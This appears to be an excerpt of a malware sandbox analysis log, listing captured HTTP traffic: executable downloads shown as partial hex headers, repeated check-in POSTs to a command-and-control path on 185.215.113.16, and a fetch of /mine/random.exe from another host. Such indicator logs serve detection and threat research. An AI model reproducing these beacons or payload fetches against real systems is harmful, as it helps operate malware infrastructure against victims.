Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Mar 2025 15:56:13 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Wed, 26 Mar 2025 23:33:49 GMTETag: "51e6d-6314744ebb140"Accept-Ranges: bytesContent-Length: 335469Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 78 5f 63 ed 3c 3e 0d be 3c 3e 0d be 3c 3e 0d be 88 a2 fc be 31 3e 0d be 88 a2 fe be b2 3e 0d be 88 a2 ff be 24 3e 0d be 9d 49 f0 be 3e 3e 0d be 9d 49 09 bf 2f 3e 0d be 9d 49 0e bf 2b 3e 0d be 9d 49 08 bf 08 3e 0d be 35 46 8e be 37 3e 0d be 35 46 9e be 3b 3e 0d be 3c 3e 0c be 29 3f 0d be c9 49 08 bf 0d 3e 0d be c9 49 0d bf 3d 3e 0d be c9 49 f2 be 3d 3e 0d be c9 49 0f bf 3d 3e 0d be 52 69 63 68 3c 3e 0d be 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 8d bf 20 62 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1e 00 1c 03 00 00 2e 01 00 00 00 00 00 30 f5 01 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 c0 06 00 00 04 00 00 00 00 00 00 02 00 40 c1 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 70 d0 03 00 34 00 00 00 a4 d0 03 00 50 00 00 00 00 40 06 00 cc 46 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 06 00 3c 23 00 00 1c b1 03 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 55 03 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 03 00 78 02 00 00 ec c5 03 00 20 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 dc 1b 03 00 00 10 00 00 00 1c 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c0 ae 00 00 00 30 03 00 00 b0 00 00 00 20 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 20 47 02 00 00 e0 03 00 00 10 00 00 00 d0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 90 01 00 00 00 30 06 00 00 02 00 00 00 e0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 cc 46 00 00 00 40 06 00 00 48 00 00 00 e2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 3c 23 00 00 00 90 06 00 00 24 00 00 00 2a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$x_c<><><>1>>$>I>>I/>I+>I>5F7>5F;><>)?I>I=>I=>I=>Rich<>PEL b.00@@
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Mar 2025 15:56:19 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Fri, 28 Mar 2025 09:12:13 GMTETag: "58800-63163774f5cc4"Accept-Ranges: bytesContent-Length: 362496Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 04 00 e2 54 e1 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 d2 04 00 00 b2 00 00 00 00 00 00 20 b1 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 06 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 8b 0b 05 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 00 d0 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 0c 05 00 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 5c d0 04 00 00 10 00 00 00 d2 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 37 20 00 00 00 f0 04 00 00 22 00 00 00 d6 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 04 d6 00 00 00 20 05 00 00 54 00 00 00 f8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 d0 3a 00 00 00 00 06 00 00 3c 00 00 00 4c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELTg @@@:.text\
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Mar 2025 15:56:28 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Fri, 28 Mar 2025 10:35:28 GMTETag: "3e1134-63164a10a017f"Accept-Ranges: bytesContent-Length: 4067636Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 78 5f 63 ed 3c 3e 0d be 3c 3e 0d be 3c 3e 0d be 88 a2 fc be 31 3e 0d be 88 a2 fe be b2 3e 0d be 88 a2 ff be 24 3e 0d be 9d 49 f0 be 3e 3e 0d be 9d 49 09 bf 2f 3e 0d be 9d 49 0e bf 2b 3e 0d be 9d 49 08 bf 08 3e 0d be 35 46 8e be 37 3e 0d be 35 46 9e be 3b 3e 0d be 3c 3e 0c be 29 3f 0d be c9 49 08 bf 0d 3e 0d be c9 49 0d bf 3d 3e 0d be c9 49 f2 be 3d 3e 0d be c9 49 0f bf 3d 3e 0d be 52 69 63 68 3c 3e 0d be 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 8d bf 20 62 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1e 00 1c 03 00 00 fe 03 00 00 00 00 00 30 f5 01 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 50 07 00 00 04 00 00 00 00 00 00 02 00 40 c1 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 70 d0 03 00 34 00 00 00 a4 d0 03 00 50 00 00 00 00 40 06 00 f8 df 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 07 00 3c 23 00 00 1c b1 03 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 55 03 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 03 00 78 02 00 00 ec c5 03 00 20 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 dc 1b 03 00 00 10 00 00 00 1c 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c0 ae 00 00 00 30 03 00 00 b0 00 00 00 20 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 20 47 02 00 00 e0 03 00 00 10 00 00 00 d0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 90 01 00 00 00 30 06 00 00 02 00 00 00 e0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 df 00 00 00 40 06 00 00 e0 00 00 00 e2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 3c 23 00 00 00 20 07 00 00 24 00 00 00 c2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$x_c<><><>1>>$>I>>I/>I+>I>5F7>5F;><>)?I>I=>I=>I=>Rich<>PEL b00@P@p
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Mar 2025 15:56:36 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Fri, 28 Mar 2025 11:56:49 GMTETag: "1d0e00-63165c3f5d75a"Accept-Ranges: bytesContent-Length: 1904128Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 e2 54 e1 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 d2 04 00 00 b2 00 00 00 00 00 00 00 c0 4a 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 4a 00 00 04 00 00 54 01 1e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 10 06 00 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 11 06 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 f0 05 00 00 10 00 00 00 d8 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 00 06 00 00 00 00 00 00 e8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 10 06 00 00 02 00 00 00 e8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 90 2a 00 00 20 06 00 00 02 00 00 00 ea 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 70 68 6e 62 79 73 65 00 00 1a 00 00 b0 30 00 00 fa 19 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 73 62 67 63 7a 75 67 64 00 10 00 00 00 b0 4a 00 00 06 00 00 00 e6 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 c0 4a 00 00 22 00 00 00 ec 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELTgJ@JT@Wk
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Mar 2025 15:56:45 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Fri, 28 Mar 2025 13:56:32 GMTETag: "b1028-63167701c47f2"Accept-Ranges: bytesContent-Length: 725032Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 09 00 28 7a e5 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 00 00 84 04 00 00 e6 00 00 00 00 00 00 b0 5c 03 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 0b 00 00 06 00 00 00 00 00 00 02 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 48 28 05 00 28 00 00 00 00 00 00 00 00 00 00 00 00 80 05 00 6c 15 00 00 00 ea 0a 00 28 26 00 00 00 e0 05 00 88 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 a1 04 00 40 01 00 00 00 00 00 00 00 00 00 00 d8 2a 05 00 68 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 65 83 04 00 00 10 00 00 00 84 04 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7c a5 00 00 00 a0 04 00 00 a6 00 00 00 8a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 21 00 00 00 50 05 00 00 0c 00 00 00 30 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 6c 15 00 00 00 80 05 00 00 16 00 00 00 3c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 67 78 66 67 00 00 00 d0 13 00 00 00 a0 05 00 00 14 00 00 00 52 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 74 70 6c 6e 65 8c 00 00 00 00 c0 05 00 00 02 00 00 00 66 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5f 52 44 41 54 41 00 00 f4 01 00 00 00 d0 05 00 00 02 00 00 00 68 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 88 06 00 00 00 e0 05 00 00 08 00 00 00 6a 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 63 53 73 00 00 00 00 00 78 05 00 00 f0 05 00 00 78 05 00 00 72 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEd(zg"\@p`H((l(&@*h.text

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 46 41 34 34 34 43 46 46 33 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFFA444CFF3FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 32 31 38 37 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1021872001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 46 41 34 34 34 43 46 46 33 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFFA444CFF3FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 46 41 34 34 34 43 46 46 33 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFFA444CFF3FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 46 41 34 34 34 43 46 46 33 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFFA444CFF3FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 46 41 34 34 34 43 46 46 33 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFFA444CFF3FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 46 41 34 34 34 43 46 46 33 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFFA444CFF3FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 46 41 34 34 34 43 46 46 33 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFFA444CFF3FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 46 41 34 34 34 43 46 46 33 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFFA444CFF3FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
